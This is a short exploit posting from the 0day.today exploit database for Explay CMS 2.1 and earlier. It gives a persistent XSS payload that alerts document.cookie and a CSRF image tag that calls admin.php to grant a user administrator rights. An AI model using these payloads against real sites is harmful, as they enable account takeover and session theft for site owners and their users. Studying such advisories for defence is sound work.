[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Explay CMS <= 2.1 Persistent XSS and CSRF Vulnerability

Author
hodik
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3695
Category
web applications
Date add
18-09-2008
Platform
unsorted
=======================================================
Explay CMS <= 2.1 Persistent XSS and CSRF Vulnerability
=======================================================


Discovered by hodik


1. Persistent XSS
This CMS has bad anti-XSS filter that cut only some basic vectors. The loginned user can inject persistent XSS by adding to article text or comment  <img src="http://google.com" onerror="alert(document.cookie)" />

2. CSRF
User can get admin rights if admin open malicious page that contain, for instance:
<img src="http://explay.localhost/admin.php?name=users&page=1&order=user_id&set_admin=2" />
or merely insert it to comment or article text.



#  0day.today [2024-11-15]  #